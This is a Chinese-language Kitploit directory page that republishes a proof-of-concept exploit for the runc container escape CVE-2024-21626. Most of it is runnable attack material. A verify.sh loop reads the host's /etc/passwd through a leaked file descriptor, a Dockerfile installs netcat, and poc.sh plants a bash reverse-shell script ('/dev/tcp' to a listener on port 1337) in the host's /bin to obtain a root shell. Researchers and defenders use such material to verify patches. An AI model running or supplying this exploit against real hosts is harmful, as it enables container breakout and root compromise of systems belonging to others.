Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-21626 — POC | Kitploit
工具/GitHubGitHub/kubernetesbachelor/cve-2024-21626
权限提升容器安全漏洞分析漏洞利用红队容器逃逸
GitHubkubernetesbachelor/cve-2024-21626

CVE-2024-21626

POC

查看仓库
251年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-21626

概念验证(POC)

要求

runc 1.1.0 <= 1.1.11

安装易受攻击的环境

部署一台Ubuntu 20.04虚拟机,并按照其指南下载Docker

root@kitploit:~
https://docs.docker.com/engine/install/ubuntu/

将Docker中已修补的‘runc’版本更换为易受攻击的版本

从runc GitHub仓库下载一个易受攻击的版本(runc 1.1.11或更早): https://github.com/opencontainers/runc/releases
选择runc.amd64(必需) runc_1111

执行漏洞利用

运行脚本‘verify.sh’

root@kitploit:~
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done

verify

将Dockerfile中的工作目录更改为通过运行verify.sh找到的正确文件描述符(fd)

root@kitploit:~
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9

构建容器

root@kitploit:~
docker build . -t name_of_container

poc.sh

root@kitploit:~
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337

运行容器镜像并在bash shell中执行poc.sh

root@kitploit:~
docker run -it --rm cve2024 bash /poc.sh

容器进入监听模式

lytte

在宿主机的根目录下创建了一个名为‘bash.copy’的新脚本,位于目录/proc/self/cwd/../../../bin/

bash

通过使脚本可执行并运行它...

root@kitploit:~
chmod +x bash.copy
./bash.copy

...你将获得宿主机上的root权限反弹shell

root

来源

https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0

下载工具